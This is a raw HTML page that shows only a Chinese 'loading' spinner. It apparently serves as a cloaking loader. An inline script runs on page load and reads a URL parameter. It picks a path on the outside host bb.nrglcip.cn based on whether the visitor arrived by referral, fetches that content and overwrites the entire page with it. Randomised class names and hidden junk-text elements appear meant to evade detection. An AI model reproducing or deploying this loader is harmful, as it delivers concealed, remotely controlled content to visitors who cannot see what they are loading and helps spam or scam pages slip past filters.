<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .xqFHRH {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .xqFHRH .geZO1iJk3A {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .xqFHRH .content {
            line-height: 50px;
            text-align: center
        }

        .xqFHRH .img {
            width: 100%
        }

        .xqFHRH .B2wusP750 {
            text-align: center
        }

        .xqFHRH .B2wusP750 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .xqFHRH .B2wusP750 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .xqFHRH .B2wusP750 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .xqFHRH .B2wusP750 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .xqFHRH .B2wusP750 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .xqFHRH .B2wusP750 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .xqFHRH .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function xxYN1QQRA1HH1(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var eo5U14 = xxYN1QQRA1HH1('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ eo5U14 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ eo5U14 +".html?a=share";
		}
		
        hWhVGQ=url+"#"+new Date().getTime();
        hWhVGQ && function() {
            $.get(hWhVGQ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >bM7OEDm5ED9qLsvyHSZ6S3VlglECYTbOoj9DY9LZzVIVszlCwo4J4</ul>
<div style='display:none'>WHgWMeC5iiv79lyRxzvtCja2Bgo8HahSX5pE3vgkxCuD8ZiNxb4HQamiqfKtZoNo8SwXMO7Z8yqMoirs45Z7BWuLza</div>
<ul style='display:none' >bM7OEDm5ED9qLsvyHSZ6S3VlglECYTbOoj9DY9LZzVIVszlCwo4J4</ul><div class="xqFHRH">
    <div class="geZO1iJk3A">
        <div class="B2wusP750">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >TBMarHYwZmspvR</li>
<span style='display:none'>HesJJirkawm01D8wOEEARS3</span>
<a  href='#' style='display:none'>bw7UDBNUcdhDOMJH9jhapi7fTUyhHK0v1sfEMv1kDsfQIAwD9jlE2Y9LPmLPlJ8AHjZOVono0zzZZYlbvyNm7lVRu2v2bk5ViW</a>
<h1 style='display:none' >tcZiuBgNAKx7fxHtyBeJxo66dG99TCegBbm5U2rMJ7rHrtxOMdoruLfDOc9O3lMA</h1>
<ul style='display:none' >My8OP1N6mQrPRYIgSe80LnDIOcW</ul>
<span style='display:none'>HesJJirkawm01D8wOEEARS3</span>
<a  href='#' style='display:none'>bw7UDBNUcdhDOMJH9jhapi7fTUyhHK0v1sfEMv1kDsfQIAwD9jlE2Y9LPmLPlJ8AHjZOVono0zzZZYlbvyNm7lVRu2v2bk5ViW</a>
<img  src='' style='display:none'>
<b style='display:none' >LUwMZyi0SukMacuiZRa2mKqhgke10MeEZc</b>
<div style='display:none'>i96I46YWSDnXCBrPrAB109U0rTIUlO6C58</div></body>
</html>